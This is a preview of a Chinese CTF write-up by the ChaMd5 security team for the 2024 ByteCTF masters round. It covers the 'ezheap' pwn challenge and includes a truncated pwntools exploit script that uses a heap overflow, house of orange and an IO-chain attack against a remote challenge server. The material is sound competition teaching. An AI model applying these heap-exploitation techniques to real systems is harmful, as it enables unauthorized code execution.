专栏名称: ChaMd5安全团队
一群不正经的老司机组成的史上最牛逼的安全团队。小二,来杯优乐美。
今天看啥  ›  专栏  ›  ChaMd5安全团队

2024 ByteCTF大师赛 writeup by Mini-Venom

ChaMd5安全团队  · 公众号  ·  · 2024-09-24 07:04

文章预览

招新小广告CTF组诚招re、crypto、pwn、misc、合约方向的师傅,长期招新IOT+Car+工控+样本分析多个组招人有意向的师傅请联系邮箱 admin@chamd5.org(带上简历和想加入的小组) Pwn ezheap edit的size可控,所以存在堆溢出。 fake_free所以没法直接释放堆块,所以打house of orange。 禁止调用hook,直接打io链即可。 from  pwn  import  * libc = ELF( './libc-2.27.so' ) elf = ELF( './pwn' ) p = remote( '113.201.14.253' , 20791 ) def   add (size) :     p.sendlineafter( 'it:' , '1' )     p.sendlineafter( 'dd:' ,str(size)) def   show (idx) :     p.sendlineafter( 'it:' ,  '3' )     p.sendlineafter( 'how:' ,str(idx)) def   edit (idx,size,content) :     p.sendlineafter( 'it:' ,  '4' )     p.sendlineafter( 'it:' , str(idx))     p.sendlineafter( 'ize' ,str(size))     p.sendlineafter( 'put' ,content) def   pwn () :     add( 0x100 ) #0     edit( 0 , 0x110 , b'a' * 0x108 +p64( 0 ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览